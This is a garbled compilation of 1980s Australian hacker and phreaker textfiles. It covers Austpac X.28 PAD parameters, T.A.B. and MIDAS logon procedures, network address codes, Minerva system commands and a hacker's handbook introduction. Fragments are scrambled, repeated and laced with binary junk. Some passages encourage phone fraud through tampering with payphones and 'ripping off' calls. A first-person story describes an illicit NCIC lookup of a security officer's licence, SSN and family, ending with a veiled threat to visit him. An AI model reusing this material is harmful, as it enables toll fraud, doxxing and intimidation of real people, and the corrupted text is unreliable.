Profile: We say farewell to datapac, but will it die that easilly. N O T S O R E G U L A R F E A T U R E S --------------------------------------------- - DNIC UPDATES New networks are being Born Every Mont6able to accept further characters, the PAD will then send the user an X-ON character. In particular, the PAD will send an X-OFF character under the following conditions : 1. Providing parameter 1 (PAD recall) is not zero, when the user sends the PAD recall character, which causes the PAD to stop transferring data and expect a command. 2. Provided parameter 6 (PAD service signals) is not zero, when an indication or answer has to be transmitted to the PAD> The PA6uD always transmits an X-ON each time it first connects to T.A.B. Note : X-ON = DC1 X-OFF = DC3 NOTE : If you wish to upload or download, then this parameter should be set to 0 prior to this operation. PAD PARAMETER 6 -------------------------------- Default parameter in Profile 7 : 1 Possible values are : 0 : The PAD does not transmit any messages or indications to the users' terminal. Instead, the PAD behaves exactly as if it had just transm6Vkitted the indication. The users' terminal will receive no information about call progress, resets, etc. Care should be exercised in setting parameter 6=0 if interaction is required. T.A.B. recommends that you do not use this setting. 1 : The PAD transmits indications to the users' terminal, either in response to a command or to report an error. 5 : The PAD transmits indications (as for value 1) but also transmits the prompt PAD signal. It does this to indicate that it i62s waiting for input from the user. The prompt signal is followed by a * PAD PARAMETER 7 -------------------------------- Default parameter in Profile 7 : 21 (DISC, INT, BRK) When a BREAK is entered from a terminal, it results in a physical break on the communications line. Possible values are : 0 : No action taken. 1 : INTERRUPT 2 : RESET 8 : Escape from Data Transfer. 21: Interrupt, Indication of break PAD message, and di6.Zscard data. PAD PARAMETER 9 -------------------------------- Default parameter in Profile 7 : 4 possible values are : 0 : no padding after carriage return. n : ("n" = 1 to 7 - inserts 1 to 7 "NULLS" after carriage return). This parameter specifies whether the PAD should transmit NULLS after it transmits a carriage return to the users' terminal. This is particularly useful if the user is using a hardcopy terminal or has a slow printer "chained"6 to his micro/terminal to copy all data received to paper. It operates the same way as the T.A.B. PAD command. It is used to ensure that characters are not sent when the mechanical device is being returned to the left hand margin of the printer/hardcopy terminal. Padding may be non-printing characters or time-fill. PAD PARAMETER 12 -------------------------------- Default parameter in Profile 7 : 1 This parameter detirmines whether the users' terminal can6 [K control the flow of data to and from the PAD by use of X-ON and X-OFF characters (CTRL-S & CTRL-Q). Possible values are : 0 : The PAD regards X-ON and X-OFF characters as data characters, and as such does not act on them when received. 1: The PAD interrupts the transmission of data to the users' terminal when it receives an X-OFF character. This X-OFF state remains until the PAD receives an X-ON character from the terminal, or until the PAD Recall character is rece6!jived. NOTE : If you wish to UPLOAD (SAVE) or DOWNLOAD, then this parameter should be set to 0 prior to this operation. PAD PARAMETER 16 -------------------------------- Default parameter in Profile 7 : 8 (BS or Backspace). Possible values are : 0 to 127 (decimal) : the decimal value of a character is to be used as the "character delete character". This is the most common delete character used, but some terminals/computers may require the use of ASCII6"Sj 127 (delete). Users Users should set both their PAD parameter 16 and their T.A.B. DELCHR to the same value. AUSTPAC PHONE CONNECTIONS -------------------------------- If your modem does not have a phone attached, your telephone hookup should be as per Telecoms' Mode 3 connection. This is outlined for your information as follows, although Telecom can easily install this for you. Any other connection, particularly if there is more than one phone on th6#/*e circuit, can result in attenuation of signal strength, which can result in "garbage" on line. If you are using any other connection type and have more than one phone installed, you should unplug all unnecessary telephones. If you are using a "Y" connector, we suggest you unplug the telephone AFTER you have established contact with Austpac (i.e. received carrier tone). Because the Austpac carrier is often weaker than a normal dial-up line, it is important that your r6$(Feceive and transmit sensitivity is as high as possible. Acoustic couplers should be adjusted to a level of -10dB. For the 1200/75 b.p.s. service, the speed must be accurate to +1% and -2 1/2%. MODE 3 TELEPHONE CONNECTION ---------------------------------------- incoming ! ! exchange line ! ! 2 ! ! 6 611 ! ! socket o--------- o ! ! \!/ \!/ o 6@"-fif required. Each menu item first notes the default setting (Profile 7) which is set when you type PROF 7 before connecting to T.A.B. There are a number of standard "PROFILES" which can be set when using Austpac. These profiles differ according to the requirements of the user. The profile closest to that required with T.A.B. is profile number 7. However, because there are so many different terminal types being used, requirements may differ, particularly in the area of the 6. delete character. Therefore, we have created this section for the benefit of users who wish to alter the paramameters they work with. All parameters can be altered prior to connecting to T.A.B. by use of the SET? command. Any number of parameters can be altered at one time. It should be noted that you can only issue up to three PAD commands prior to connecting to T.A.B. Once connected to T.A.B. you can issue a command to the PAD to change any parameters. To do this, 6Ňjyou must enter the "PAD RECALL" character (default is CTRL-P). Nothing will be displayed on the screen to prompt you at this stage. After issuing your PAD command, you will be automatically placed back into the T.A.B. system. As usual, if you have any problems with this, please feel free to contact us on (03) 813.1133 during Melbourne business hours or send us a note via Electronic Mail to username TAB. PAD PARAMETER 1 -------------------------------- Defa6ult parameter in Profile 7 : DLE (CTRL-P) This parameter allows a user to exit the "Data Transfer State" to the "Command State" to issue ONE PAD command. Possible values are : 0 : No PAD RECALL character is defined. All characters sent from the users' terminal are forwarded to T.A.B as data, with full transparency. Note : when parameter 1 has a value of 0, the BREAK signal may be used for PAD recall if parameter 7 is set to value 8. 1 : (DLE or CTRL-P). 32 to63a 126 (decimal) : Decimal value of binary number representing the character to be interpreted as the PAD recall character. After issuing the PAD recall, you are placed in the PAD COMMAND mode, and the NEXT set of characters sent by you are treated as PAD commands. There is no prompt from PAD at this point, unless you have parameter 6 (Indications) set to 5. This will result in a prompt of *. If you have typed a line, but have not yet sent it through to T.A.B. by pressing6 carriage return, using the PAD recall character will send the data through. Therefore, if you use the delete key on this text AFTER altering a PAD parameter, it will have no effect, as the data will have already been transmitted. PAD PARAMETER 2 -------------------------------- Default parameter in Profile 7 : 1 (echo on) This parameter specifies whether Austpac (PAD) echoes each character entered. Echo is usually only turned off when the user is in "half6A-duplex" mode, i.e. the characters typed are sent to the screen as well as through your acoustic coupler or modem. If you can change your terminal program from full duplex to half duplex it can be used to check that what you type is being correctly received and interpreted by Austpac. Possible values are : 0 : no echo 1 : echo enabled. PAD PARAMETER 3 -------------------------------- Default Parameter in Profile 7 : 2 - CR (carriage return) 6+\When using Austpac, all data is stored by the PAD until the "Data Forwarding Signal" is received. Then the information stored by the PAD is sent through to us. The standard preferred data forwarding signal is CR (carriage return), but the other possibilities are : 0 : no data forwarding signal. 2 : data forwarding signal is carriage return (CR). 6 : and are all data forwarding signals. 18: and are data forwarding sign6D;als. 126: All non-printing characters (including DEL) are data forwarding signals. These characters are : NUL, SOH, STX, ETX, EOT, ENQ, ACK, BEL, BS, HT, LF, VT, FF, CR, SO, SI, DLE, DC1, DC2, DC3, DC4, NAK, SYN, ETB, CAN, EM, SUB, ESC, FS, GS, RS, US Note 1 : when parameter 3=126, editing characters (including delete) should be selected from the non-printing characters listed above, to avoid conflict of use. Note 2 : The data forwarding signal is included in the da6 S(ta sent through to T.A.B. and is the last character in each "packet". Note 3 : Other conditions which cause data to be sent to T.A.B. from PAD are : A full PAD buffer (packet) of up to 128 characters, providing this data does not include a data forwarding signal. Receipt of a BREAK signal. Escape to PAD Command mode. Receipt of PAD messages (i.e. from Austpac, not T.A.B.) PAD PARAMETER 5 -------------------------------- Default parameter in 6Profile 7 : 1 Possible values are : 0 : The PAD does not generate X-ON & X-OFF characters. 1 : The PAD uses X-ON and X-OFF for flow control. In certain circumstances, for reasons of flow control the PAD may be momentarily unable to transmit data to the correspondent, and if parameter 5 is not zero, the PAD will send to the users' terminal/computer an X-OFF character (CTRL-S). The users' terminal should then cease to transmit characters. To indicate that it is 65*e quantities called packets, each of controlled format and with a maximum size". The service is implemented on a completely new network designed specifically to provide universal, shared, intelligent network for switched data communications. A variety of conventional terminals, or computers emulating terminals, can communicate with us via a Telecom adaption facility called PAD (packet Assembly/Disassembly facility). The PAD controls the format and flow of data in both 6directions. If you would like a copy of the Austpac "Asynchronous Character Data Terminal Users Guide" contact one of the above phone numbers. This will explain how to use Austpac correctly and also explains how to set your own parameters if the standard PAD Profile 7 does not suit your terminal/computer. There are times when Austpac will not be available for general use due to maintenance and upgrading. These interruptions may occur at any time without notice, but the 6'. frequency of these interruptions should become less and less as the system is fine-tuned. AUSTPAC LOGON INSTRUCTIONS -------------------------------- To connect to T.A.B. via Austpac, you should first establish a connection with the PAD (Austpac). The procedure for this is as follows : 300 BAUD : 1. Dial the Austpac number 01921. This number is available from any automatic telephone exchange in Australia. 2. When you get the carrier signal, co6m#kunnect your coupler or switch your modem to DATA. 3. Wait about 5 seconds, and then press H followed by carriage return (Note: all input at this stage must be in upper case only.) You should then get the message AUSTPAC, which indicates a successful connection has been made. If the word AUSTPAC appears on your screen prior to entering H, connection has already been made and this step is not necessary. This procedure identifies your baud rate to Austpac, as this phone numbe6˺r is for all terminals operating between 110 to 300 baud. 4. type PROF 7 (carriage return). This sets the PAD profile, or characteristics to the Austpac standard profile number 7, which is the profile most suited for connection to T.A.B. 5. You must then enter our identification code, which is ?238220000 (carriage return). Note : the question mark IS required! After a short pause, the message COM should be returned and you will then get the T.A.B. logon message. Procee6  떵d as per normal from this point on. 1200/75 BAUD : 1. Dial 01923 instead of 01921. This is Austpacs' Teletext facility which does provide the capabilities of connecting to us. You do NOT need to enter H for this connection, as the baud rate is fixed. 2. follow steps 4 to 6 (above) to connect to T.A.B. If you have any difficulties at all, please write to username TAB on the system or call us on (03) 813.1133. AUSTPAC ERROR CODES -------------------6 g------------- 1 . Austpac Codes Information 2 . CLR DER 3 . CLR DTE 4 . CLR ERR 5 . CLR INV 6 . CLR NC 7 . CLR OCC AUSTPAC CODES INFORMATION -------------------------------- The following codes are a few of the codes which may be returned by the PAD. They are usually in the format of: CLR XXX nnn, where "XXX" equals the code and "nnn" is an I.D. number associated with that message. The I.D. number is only of use if it becomes necessary to i6 jnform us of the code received, whereapon you should give us the complete code received. CLR DER -------------------------------- This error is returned when our Austpac link is unavailable. Please call the T.A.B. Hotline number and leave a message. CLR DTE -------------------------------- This code is returned when you have been disconnected by us after logoff or due to some other fault. If you get this message other than after logoff, please l6 2>et us know. CLR ERR -------------------------------- This error code is returned due to a procedure error cuased by the operator, e.g. incorrect format. CLR INV -------------------------------- This error code is returned by an error in your TAB I.D. entry. Try again with the correct identification - ?238120000 CLR NC -------------------------------- This code is returned when a network condition exists such as (1) temporary 6 7 congestion or (2) a temporary fault. This code is returned by Austpac itself and is not related to T.A.B. Try again later. CLR OCC -------------------------------- This error code is returned when the number required is busy. This means that either all available lines are currently in use or the system is temporarily unavailable for some reason. Try again later. SETTING AUSTPAC PAD PARAMETERS -------------------------------- 1 . Pad Pa6ŒHrameters - General Info. 2 . PAR 1 - PAD RECALL 3 . PAR 2 - ECHO 4 . PAR 3 - FORWARDING SIGNAL 5 . PAR 5 - XON/XOFF BY THE PAD 6 . PAR 6 - PAD MESSAGES 7 . PAR 7 - "BREAK" SIGNAL OPERAT'N 8 . PAR 9 - CARRIAGE RETURN PADDING 9 . PAR 12 - XON/XOFF BY THE USER 10. PAR 16 - DELETE CHARACTER PAD PARAMETERS - GENERAL INFO. -------------------------------- This section describes each of the RELEVANT PAD parameters and how to set them for your particular terminal ( ْ5OVE - save Text and EXIT from editor SA filename - save Text as filename and exit from Editor Q - QUIT and EXIT from Text Editor System [Note: all editing and input is lost] More information on dialling, using and obtaining passwords are on the way real soon.......basic instructions first. Also to come in my next article 'The do-it-yourself Telescum bypass Fone Surgery' - be a Profitcom surgeon --> THE BEST way to rip off a heap of IDD/STD calls in the convenience of your own hom( Te, including diagrams. Brought to you in conjunction with the Imperial Wizard KKK international. Written and distributed by Reign of Terror...: NPUT mode for entering text EDIT mode must be entered before modifying the text Editor Commands T - Go to TOP of text B - " " Bottom of text L word - LOCATE line containing 'word' Nor U3 - Go down to NEXT line or down 3 Uor U3 - " up " " " " up " P or P3 - PRINT currnet line or print lines SP - enter the SPELL system SA* ʤ be playing with UNIX, the fashioable multi-tasking operating system. The assumptions I have made about you as a reader are that you own a modest personal computer, a modem, and some communications software which you know how to use. For more advanced hacking, better equipment helps; but just as vert tasty photographs can be taken with snap-shot cameras, the computer equivalent of a Hasselblad with a trolley-load of accessories is not essential. Since you may at this point * _Sbe suspicious that I have vast technical resources at my disposal, let me describe the kit that has been used for most of my network adventures. At the centre is a battered old Apple II+, it's lid off most of the time to draw away the heat from the many boards cramming the expansion slots. I use an industry standard dot matrix printer, famous equally for the variety of type of fonts possible, and for the paper-handling path, which regularly skews off. I have two large boxes crammed f*ݵ\ull of software, as I collect comms software in particular like a deranged philatelist, but I use one package almost exclusively. As for modems - well, at this point the set-up does become uncoventional; by the phone point jack sockets for BT 95A, BT 96A, BT 600 and North American modular jack. I have two acoustic couplers, devices for plunging telephone handsets into so that the computer can talk down the line, at operating speeds of 300/300 and 75/1200. I also have three heavy, mus*]hroom coloured 'shoe-boxes', representing modem technology of 4 or 5 years ago and operating at various combinations of duplex/half duplex. Whereas the acoustic connects my computer to the line by audio, the modem links up at the electrical level and is more accurate and free from error. I have access to other equipment in my work and through friends, but this is what I use most of the time. Behind me is my other important bit of kit: a filing cabinet. Hacking is NOT an activity*:/j confined to sitting at keyboards and watching screens. All good hackers retain formidable collections of articles, promotional material and documentation; read on, and you will see why. Finally, to those who would argue that a hacker's handbook must be giving guidance to potential criminals, I have two things to say: First, few people object to the sports of clay-pigeon shooting or archery, although rifles, pistols and crossbows have no 'real' purpose other than to kill things *[- and hacking is not as it is shown in the movies and on tv, a situation which the publication of this book may do something to correct. The sport of hacking itself may involve breach of aspects of law, notably theft of computer time and unlicesed usage of copyright material; every hacker must decide individually each instance as it arises. Various people helped me on various aspects of this book; they must all remain unnamed - they know who they are and that they have my t*)gQhanks. ---- End of the Introduction ---- ching screens. All good hackers retain formidable collections of articles, promotional material and documentation; read on, and you will see why. Finally, to those who would argue that a hacker's handbook must be giving guidance to potential criminals, I have two things to say: First, few people object to the sports of clay-pigeon shooting or archery, although rifles, pistols and crossbows have no 'real' purpose other than to kill things 6Pcalculate your Austpac charges based on the following rates Peak ( 8 am to 6 pm Monday to Friday ) : $4.95/hour Off-peak ( all other times ) : $3.95/hour. A minimum call charge of $0.20 applies to cover your local call fee (which is charged to us) and the Austpac minimum time and data charges. General info : AUSTPAC allows users to connect to T.A.B. cheaper that S.T.D. from anywhere in Australia. It is a "Packet Switched Data Service" designed specifi6bcally for computer or terminal data transfer over Telecom phone lines. A number of other services are available via Austpac and information on these can be obtained by ringing one of the following numbers : Head Office : (03) 606.7772 N.S.W. : 267 6699 Victoria : 605 6250 Queensland: 225 6400 South Aust: 225 7435 West. Aust: 420 7230 Tasmania : 20 8800 A.C.T. : 45 5555 "Packet Switching" can be defined as "the routing of data in discret& $,heese" from there, and I voice validated him, and he said he worked for a small telco called Stromberg... I'm onto him now. Later in the week, I'm in a telco office in a nearby major city, I happen to see a book, marked "confidential employee numbers for ATT" I thumb thru and lo and behold, a R.F. Stromburg works at an office of ATT in Denver, and I can't cross reference him to an office. (A sure sign he's in security) well, not to be done by this looser... I dial up NCIC and&J check for a group search for a Drivers licence for him... Bingo, Licence number, cars he owns, his SSI number, and a cross reference of the Licence files finds his wife, two kids and a boat registered to him. I've never called him back, but If I do have any trouble with him, I'm gonna pay a little visit to Colorado.... I grab the phone and call it.. Its the Stromberg Telephone company... Bingo.. I've got him. I search my user files and come up with a user called "Coc( MTextfiles. >RUNOF - Enter TEXT FORMATTING System. >SPELL - Enter the Textfile SPELL system. >JU - Enter the Textfile JUSTIFY System. >CHAT user id - 'Talk' with another user on the system. >REQUEST form - Enter the Forms System. >PHONE - Enter the Phone Messages. >PHONECK - Check your Phone Messages. >MAILCK - Check your Mailbox. >MAIL - Enter the MAIL System. To change a password: >PASSWD Old Password: Enter the present password. New Owner Password: Enter the new passw(4sUord. Enter it Again: Enter the new password again. All Done 1. Utility Options for >MAIL The following commands may be used at any prompt of following the MAIL command on the same line. DISPLAY DIR Display Corperate Directory. DISPLAY DIR HACKER? will search for all the names beginning with HACKER. DISPLAY REF Display Cross-Reference. Directory. DISPLAY REF BRO? will do same as abo(j{ve. DISPLAY FILES Will display MAIL FILE catagories. DELETE FILE Will delete entire FILE CATAGORY DELETE FILE catagory. HELP The oldest for hackers and still the best on most telescum systems. QUIT Will quit and exit from mail. 2. Sending Mail >MAIL Send, Read or Scan:SEND To e.g To: Hackme CC Carbon Copy to Hackme BC () Blind Carbon to " AR Acknowledgement Requested RR Reply Requested EX Express delivery (great isn't it !) DA d/m/y date activated on d/m/y Subject: Enter the title of message Text: " body of the message Type .S to send the message .HELP yup the same kind(} of HELP as before 3. Reading >MAIL READ Read all mail REad EXPRESS Read EXPRESS items (great for hack info as they are very unlikely to get read due to the priority and quick packets they are sent in) READ BOTH READ RECIEVED AND SENT MAIL AGAIN READ text again SAVE TEXT filenam(xOe SAVE as a TEXT file only DELETE DELETE message RETURN next msg Q Quit/Exit from MAIL 4. Scanning >MAIL SCAN SCAN MAIL SCAN UNREAD SCAN mail - UNREAD items SCAN BOTH SCAN RECIEVED and SENT mail QSCAN QUICK SCAN mail When you are scanning MAIL, the following onformation will appear: 1 (  5 From: Name Posted: date & time no. (lines) SUBJECT: Message title 2 From: Name Posted: date & time. System no. (lines) SUBJECT: Message title READ 7 READ item number 7 Q Quit/Exit from MAIL 5. Phone Messages >PHONE [Note: A very usefull system.....later] Enter. Read or scan: Enter For: Name From: Caller Telephone: Optional Message: All normal text options apply here THE TEXT EDITOR SYSTEM There are( ŝm two basic ways to enter the Text Editor 1. From the Text mode hwen sending mail enter .ED 2. From the main System level enter >ED or >ED filename INPUT mode for entering text EDIT mode must be entered before modifying the text Editor Commands T - Go to TOP of text B - " " Bottom of text L word - LOCATE line containing 'word' Nor U3 - Go down to NEXT line or down 3 Uor U3 - " up " " " " up " P or P3 - PRINT currnet line or print lines SP - enter the SPELL system SA(1H= Summary of system commands on Minerva OTC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >OFF - Sign off. >L - list all files on this ID. >RENAME file 1 file 2 - Rename file 1 as file 2. >PASSWD - Change ID Password >F - List file information on this ID. >DEL filename - Delete file 'name'. >DIARY - Enter the diary system. >ED - To create a new Textfile. >ED filename - To edit the existing Textfile. >TY filename - Type/Display Textfiles. >PAGE66 - Paginate/Display $ your call. SPECIAL CONTROL FEATURES FOR DIRECT MIDAS USERS --------------------------------------------------- 1.In the event that your Host does not successfully disconnect your call, the following procedure will enable you to clear the call: Enter P follower by CLR and a carriage return. In response to this, the message below will be printed on your terminal confirming that the call has been cleared. XXXXX CLR CONF * Now terminate your session in the normal manner. 2.If you$r terminal requires flow control (using X-ON, X-OFF) from MIDAS you can enable this option by entering SET 5:1 following receipt of the "*" prompt, prior to making a call. Note this option will be disabled at the completion of a call. I.E. = MIDAS XXXXX *SET 5:1 Note: flow control from your terminal to MIDAS is standard. DIFFICULTIES AND FAULTS ----------------------- [Ed:I'll put this in, but be careful what you say, and perhaps the best time to r$EX7ing is during OFFICE HOURS.] If you are expierencing difficulties in making a call, assistance may be obtained from the MIDAS FAULT REPORTING CENTRE by telephoning 02 218 4825 or Telex AA0105 . When reporting faults, please take note of the SERVICE MESSAGE (See 'The Midas File' or 'MIDASF') on your screen and convey this information to the FAULT REPORTING CENTRE as this wil assist in the diagnosis of your difficulty. MAKING A MIDAS CALL VIA AUSTPAC ------------------------------- SERVICE MESSAGES FROM AUSTPAC ----------------------------- For information on service messages recieved from AUSTPAC, consult your AUSTPAC Character Mode (X.28) Terminal Operator's Manual. [Ed: has anyone got the X.28 Terminal Operator's Manual??] GLOSSARY ======== ACCOUSTIC COUPLER A means of coupling a modem to the telephone network without requiring an electrical connection. ASCII American Standard Code for Inf$mbormation Interchange. A 7 bit code commonly used in data transmission, with an optional 8th bit that is used for parity. BIT Binary Diget; in data communications the smallest bit of information in the system. BPS Bits per second; a term employed to describe the information transfer rate. BUFFER A storage device used to compensate for differences in the rate of data flow. ECHOCHECK A method of checking the accuracy of data in which the recieved data is returned to the sending end for $ ocompensation. ECHOPLEX An echo check applied to network terminals operating in full duplex mode. FULL DUPLEX Simultaneous send and recieve capability. HALF-DUPLEX Alternate send and recieve capability. HOST COMPUTER A computer attached to a network providing primary services such as computation, database access or special programs or programming language. MODEM Modulator/Demodulator. Item of equipment necessary to translate digital data output from a communications terminal into a fo$ ~b\rm sutiable for transmission over a telephone circuit and visa versa. NODE A network concentrator or switching facility. NUI (Password) This is equivelent to a password and therefore it is not displayed (for security purposes) when entered. NUI is an abbreviation for Network User Identifier. PORT A communications line termination on a host or network mode. [Ed:that's all the basic stuff, and here's a little 'tit-bit' out of the tarrif schedule February 1985] BILLING ======= At the en$ cXd of each callendar month, OTC renders a comprehensive statement itemising each international call, detailing the date, time, session duration, data volume transfered and cost. This account is sent to all users who have incurred MIDAS charges in the given month. [Ed: perhaps this is why midas p/w's never last that long!!] -END . [Ed: has anyone got the X.28 Terminal Operator's Manual??] GLOSSARY ======== ACCOUSTIC COUPLER A means of coupliput from a communications terminal into a fo& øjewuser" on the board... and the language hes using is... well "Intimidating"... "I want you all to know I'm with the OCC task force and we know who you are... we are going to have a little get-to-gether and "talk" to you all. Hmmm... a looser?... I go into chat mode... "hey dude, whats up?" I ask. "Your number asshole" he says.... Well fine way to log on to a board if I do say.... "Hey, you know I talked to you and I know who you are.." "Oh Yeah...Who am I?." he hesitates and sa&ys... "well uh.. you used to work for sprint didn't you?" I say, "no, you've got me confused with someone else I think, I'm a Junior in High school." "Oh Yeah?.. You got some pretty big words for a high school kid he says...." "Well, In case you didn't know, they teach English as a Major these days...." He says... "Do you really want to know which LD company I'm with?" I say "NO, but if it will make you happy, tell me." He says MCI. (Whew! I&n> dont use them)... "Well your outa luck asshole, I pay for my calls, and I dont use MCI. He's dumbfounded." I wish him the worst as he asks me to leave his rather threatening post up on my board and we hang up on him. Now, I'm half parylized... hmmm.... Check his infoform... he left a number in 303... Denver.... I grab the phone and call it.. Its the Stromberg Telephone company... Bingo.. I've got him. I search my user files and come up with a user called "Coc":}h char term (FREE or ENGAGED) CLR to clear a virtual call (CLF CONF or CLR ERR) PAR? Request values of all params in list and requst current value (no list=all) SET? As above exc"y/ept doesn't request current values. CALL REQUEST (see later) set up a virtual call. ------------------------- In the previous command list the ones above PROF need a response. PROF and below the only response is the ACKNOWLEDGMENT indication of examples of these commands would be : PROF 10 SET 2:0,5:4 SET?3:0 PAR?1,5,8 or PAR? STAT Normal access numbers are 01921 - 110,150,200,300 bit/s profile 0 01922 - 1200 bit/s profile 0 "` 01923 - 1200/75 bit/s videotex profile 9 *profile 9 is not available to user accessing with # 01921 or 01922. Videotext users : call requests may be preceeded by or <*> and all commands including call request can be terminated by <+> or <#> In the next couple of messages network responses and call requests! O.K for those who have access to minerva and dont know how to access telenet , tymnet .....ect...ect well try this at the @ prompt type this.... @ C :0311030100055 "B0-FCTY got it now....... check ya!! Network responses and error messages. ------------------------------------- CLR OCC called number occupied CLR INV invalid facilty requested CLR ERR a local procedure error has been detected CLR PAD PAD has cleared the call at the invitation of the remote char term RESET(cause) reset of the virtual call CLR NA network congestion CLR NA access not permitted CLR NP called number not assigned CLR DER called number out of order CLR "tRNA called number does not subscribe to reverse charging CLR RPE a procedure error has been detected at the remote DTE network interface CLR ID the call is not compatible with the remote destination CLR CONF clear command from the local char term acknowledged CLR DTE remote DTE cleared the call AUSTPAC terminal connected to austpac PAD COM call connected The number which often follows the above is a diagnotic code used when finding faults. Before I continue there"N?Z is a small error in the last message the first CLR NA in the list should be CLR NC.....sorry CALL REQUEST FORMATS -------------------- call request to austpac customer (automatic reverse charging request) ? eg. ?288888888 call request to austpac customer using NUI ?N - where NUI is your own 12 char alpha-numeric code.Chars after N are not echoed until the - eg. ?NUSERIDENT"?ITY-288888888 call request to a user in another country ?N -0 eg. ?NUSERIDENTITY-0888888888888888 2 other command which may be used in call requests are R and Gnn where R is for reverse charging and Gnn is a closed user group and nn being the local reference number. eg. ?G03,R,NUSERIDENTITY-236021234PSECRET99 A user data or password field may follow the address the password is prefixed with P and the data is prefixed with D by the user (you)">. You cannot have data and password and the information is passed on to the destination system (I think) eg. ? G03 , R, N USERIDENTITY - 236021234 P SECRET99 ? G03,R, N USERIDENTITY -23602123 D ANYTHING the data or password length may be up to 12 alpha-numer chars As you would have seen spaces may be included for clarity. These have no effect. Well that wraps up all the info (summary) in 'Asynchronous Character Mode Service (X.28) User Guide' it is an AUSTPAC manual whi"vch is plastic spiral bound. If you don't want all the parameter trash I recommend you read the first message or two and messages 12 and 13. Well that's it. If you read it all or downloaded/printed it, drop me a line, I'd like to know how many people were interested. Until next time this is Captain Hack signing off. Have fun and happy hacking AUSTPAC. -=> Captain Hack <=- ord field may follow the address the password is prefixed with P and the data is prefixed with D by the user (you)$QS^ly in the accoustic coupler, or flicking the PHONE/DATA switch on your direct-connect modem 4.Enter an "=" (equals) sign. 5.MIDAS will respond with:- = MIDAS XXXXX (where XXXXX is the MIDAS port indentification number) * 6.On receipt of the"*" prompt, enter "N" followed by your MIDAS NUI followed by a "-"(dash) and "0" (zero) with the Host Address followed by a carriage return. I.E. NABC123-0310688888888 ^^^^^^ ^^^^^^^^^^^^ NUI HOST ADDRESS (P$GASSWORD) Note: Your NUI is not printed. 7.MIDAS will respond when the call is connected with:- 0310688888888 (where 0310688888888is the called address) COM 8.After you have completed your work session, sign off from your host according to the procedures set by the host. 9.MIDAS acknowledges your request to terminate your call by:- MIDAS XXXXX (where XXXXX is the MIDAS port identification number) CLR PAD * 10.On receipt of the "*" prompt you may then log into another host or terminate" jutonet 3126 " COUNTRY NETWORK DNIC --------------------------------------- France Transpac 2080 " NTI 2081 Germany Datex-P 2624 Hong Kong Idas 4542 " " Das 4544 Japan Venus/P 4408 " DDX/P 4401 Luxemburg Luxpac 2704 New Zealand Pacnet 5301 Norway Norpak 2422 Singapore Telepac 5252 South Afric"nRVa Saponet 6550 Sweden Telepak 2405 Switzerland Telepac 2284 " Datalink 2289 U.K. IPSS 2341 " PSS 2342 U.S.A. Itt 3103/3107 " Wui 3104 " Tymnet 3106 " Telenet 3110/3127 " Rca 3113 COUNTRY NETWORK DNIC --------------------------------------- U.S.A. Trt 3119 " "w Uninet 3125 " Autonet 3126 " Alaskanet 3135 -------------------------------------- Access to other networks and countries may be available in the future. PAD (packet assembly/disassembly) is used because char terms (us) can't handle packets. There are currently 18 parameters. #1 PAD recall using a character. This is the char to change from transfer to command mode. 0 not possible 1 char (ie CTRL P) 32-126 Pos"Qsible; using one graphic char defined by user #2 Echo of characters by PAD 0 no echo 1 echo #3 Selection of data forwarding signals. This is the char(s) that when received take chars in PAD buffer and assembles it into a packet. 0 no data forwarding signal 2 Char 126 All chars in column 0 and 1 (of IA5) and char 6 Chars 18 Chars #4 Selection of idle timer delay. Timeout time from last c"  )har to when the input buffer is assembled and sent. 0 no timer delay 1-255 value in twentieths of a second. #5 Ancillary device control. This enables austpac to send char terminal x-on/x-off. 0 no use of x-on (DC1,CTRL Q) & x-off (DC3,CTRL S) 1 use x-on/x-off #6 Control of PAD service signals. Determines whether PAD indecations are sent to char term. 0 no PAD service sigs are transmitted 1 PAD service signals are transmitted 5 PAD service signals "  tand the prompt PAD service siganls are transmitted. #7 Selection of operation of PAD on receipt of break signal from the char term. 0 nothing 1 interrupt 2 reset 8 escape from data transfer mode 21 discard output, int and indication of break #8 Discard output. Determines whether you get data from remote 1 discard output 0 normal data delivery #9 Padding after 0 no padding after 1-7 # of padding chars inserted after #10 Line folding. L"  ine length. Sends after x chars 0 no line folding 1-255 line length #11 Binary speed of char term. 0 110 bit/s 2 300 bit/s 3 1200 bit/s 6 150 bit/s 8 200 bit/s 11 1200/75 bit/s #12 Flow control of PAD. Determines whether char term can suspend output with x-on/x-off 0 no use of x-on/x-off (CTRL Q & S) 1 use of x-on/x-off #13 LF insertion after CR. 0 no LF 1 insert LF after CR 4 insert LF after echo of CR to char term 5 "  V']insert LF after transmissionto the char term and after echo of CR 6 insert LF in data stream after CR from char term and after echo of a CR to the char term 7 insert LF in data stream to and from char term and after echo of a CR to char term #14 Padding after LF 0 no padding after LF 1-7 # of padding chars inserted after LF (applies only to data transfer mode) #15 Editing. 0 no use of editing in data transfer mode 1 use of editing in "  LAdata tranfer mode #16 Character delete. 0-127 one char from IA5 8 char (default) #17 Line delete. 0-127 one char from IA5 24 char (default) #18 Line display. 0-127 one char from IA5 42 char <*> (default) -------------------------------------- IA5 = CCITT international alphabet # 5 (approx ASCII) char term = C-DTE (officially) = out computer terminal The above parameters are changable by the user. If you have an NUI then the default can be dif"-rferent to normal. A profile is a snap-shot of all the params. There are 18 I won't type them all out take too long. PSTN (us) customers are usually assigned profile 0 (up to 300 or 1200 bit/s). Videotex (1200/75) use profile 9. Profile # Param # I 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18. --------------------------------------------------------------- ----------- 0 I 1 1 126 0 1 1 2 0 0 0 na 1 0 0 0 8 24 42"L 9 I 1 1 126 3 0 1 1 0 0 0 na 0 0 0 0 8 24 42 .....cont next mesg If you look and think you'll realize that param 11 (speed) cannot be set by the user. COMMANDS : The PAD is either in command or data transfer mode. To get from data to command you use the pad recall char (CTRL P unless you changed it!) or in some circumstances a BREAK signal is used. COMMAND FUNCTION -------------------------- STAT to request info about a virtual call wit 5w~g able to use it to call localy.. Section 7 Bye.. Well thats about it, the rest it up to you and of course Be Carefull Out Their.. Section 8 Thanks.. Thanks to : The Lensman.. (69 Ford) Disk Destroyer.. Ice Man.. The Overlord.. And all the others whom have come out playing with Fone Boxes with us.. New Method In The Next File : / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / /  * Copywrite 89' Have Phun Phreaking Guys / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / little old Granny comes along the next day and wants to use the fone and see's Wires and Shit hanging out of the Case, she then calls Telecom and then you have to find another Box. This will work for a while unitll Telecom see's the Bill that the Fone Box you used and it will have an automatic ISD/STD bar on it and you'll only be 9ore they were discovered, computer enthusiasts and network users said 